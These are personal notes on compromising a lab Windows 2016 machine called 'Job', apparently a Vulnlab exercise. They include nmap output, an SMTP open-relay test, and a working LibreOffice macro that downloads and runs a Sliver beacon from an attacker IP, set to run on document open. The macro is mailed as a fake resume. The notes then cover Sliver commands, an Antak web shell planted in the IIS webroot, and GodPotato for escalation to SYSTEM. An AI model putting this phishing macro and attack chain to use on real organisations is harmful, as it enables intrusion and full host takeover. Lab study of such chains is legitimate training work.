Job

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Windows 2016

Chain: False (standalone compromise)

Information Gathering

25/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Service enumeration

HTTP:80

Possible attack path: Please send your application to career@job.local ! We recently switched to using open source products - please send your cv as a libre office document.

SMTP

The server is vulnerable to an open relay, which means that any unauthenticated user can send emails through it.

❯ nmap -p25 -Pn --script smtp-open-relay 10.10.94.125
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 13:20 EDT
Nmap scan report for 10.10.94.125
Host is up (0.17s latency).

PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)

Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds

Initial Access

During the assessment, the tester configured a Sliver server and generated a beacon named http-vulnlabs-4444.exe for use throughout the assessment.

To create the malicious macro:

Go to Tools > Macros > Organize Macros > Basic
By selecting you document, set a Name.

REM  *****  BASIC  *****

Sub InitialAccess
	Shell("cmd /c powershell IWR -URI http://10.8.5.48:8081/http-vulnlabs-4444.exe -Outfile C:\Windows\Temp\http-vulnlabs-4444.exe")
	Shell("cmd /c 'C:\Windows\Temp\http-vulnlabs-4444.exe'")
End Sub

To configure auto open:

Go to tools > customize > open document > select macro.

❯ sendemail -t career@job.local -f john.smith@gmail.com -a Resume.odt -u "Subject: Appliction Resume" -s 10.10.94.125 -v
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.
      
May 06 13:23:38 kali sendemail[83617]: Message input complete.
May 06 13:23:38 kali sendemail[83617]: DEBUG => Connecting to 10.10.94.125:25
May 06 13:23:38 kali sendemail[83617]: DEBUG => My IP address is: 10.8.5.48
May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 	220 JOB ESMTP
May 06 13:23:38 kali sendemail[83617]: INFO => Sending: 	EHLO kali
May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 	250-JOB, 250-SIZE 20480000, 250-AUTH LOGIN, 250 HELP
May 06 13:23:38 kali sendemail[83617]: INFO => Sending: 	MAIL FROM:<john.smith@gmail.com>
May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 	250 OK
May 06 13:23:38 kali sendemail[83617]: INFO => Sending: 	RCPT TO:<career@job.local>
May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 	250 OK
May 06 13:23:38 kali sendemail[83617]: INFO => Sending: 	DATA
May 06 13:23:39 kali sendemail[83617]: SUCCESS => Received: 	354 OK, send.
May 06 13:23:39 kali sendemail[83617]: INFO => Sending message body
May 06 13:23:39 kali sendemail[83617]: Setting content-type: text/plain
May 06 13:23:39 kali sendemail[83617]: DEBUG => Sending the attachment [Resume.odt]
May 06 13:23:40 kali sendemail[83617]: SUCCESS => Received: 	250 Queued (1.500 seconds)
May 06 13:23:40 kali sendemail[83617]: Email was sent successfully!  From: <john.smith@gmail.com> To: <career@job.local> Subject: [Subject: Appliction Resume] Attachment(s): [Resume.odt] Server: [10.10.94.125:25]

Lateral movement as iis apppool\defaultapppool user

During the enumeration, it was discovered the user jack.black belongs to JOB\Developers domain group, which possess Full Permission over C:\inetpub\wwwroot directory.

sliver (http-vulnlabs-4444) > sa-whoami 

[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:

UserName		SID
====================== ====================================
JOB\jack.black	S-1-5-21-3629909232-404814612-4151782453-1000


GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
JOB\None                                          Group                    S-1-5-21-3629909232-404814612-4151782453-513  Mandatory group, Enabled by default, Enabled group, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
JOB\developers                                    Alias                    S-1-5-21-3629909232-404814612-4151782453-1001 Mandatory group, Enabled by default, Enabled group, 
<SNIF>

sliver (http-vulnlabs-4444) > sa-cacls wwwroot

[*] Successfully executed sa-cacls (coff-loader)
[*] Got output:
C:\inetpub\wwwroot JOB\developers:(CI)(OI)F

Uploading a antak web shell

sliver (http-vulnlabs-4444) > upload /usr/share/nishang/Antak-WebShell/antak.aspx

[*] Wrote file to C:\inetpub\wwwroot\antak.aspx

Getting a reverse shell using sliver as IIS APPPOOL\DefaultAppPool

sliver (http-vulnlabs-4444) > whoami

Logon ID: <err>
[*] Current Token ID: IIS APPPOOL\DefaultAppPool

Privilege escalation as NT Authority System

Binary: GodPotato-NET4.exe

Last updated 6 months ago

hashtagMachine information

hashtagInformation Gathering

hashtagService enumeration

hashtagHTTP:80

hashtagSMTP

hashtagInitial Access

hashtagLateral movement as iis apppool\defaultapppool user

hashtagUploading a antak web shell

hashtagGetting a reverse shell using sliver as IIS APPPOOL\DefaultAppPool

hashtagPrivilege escalation as NT Authority System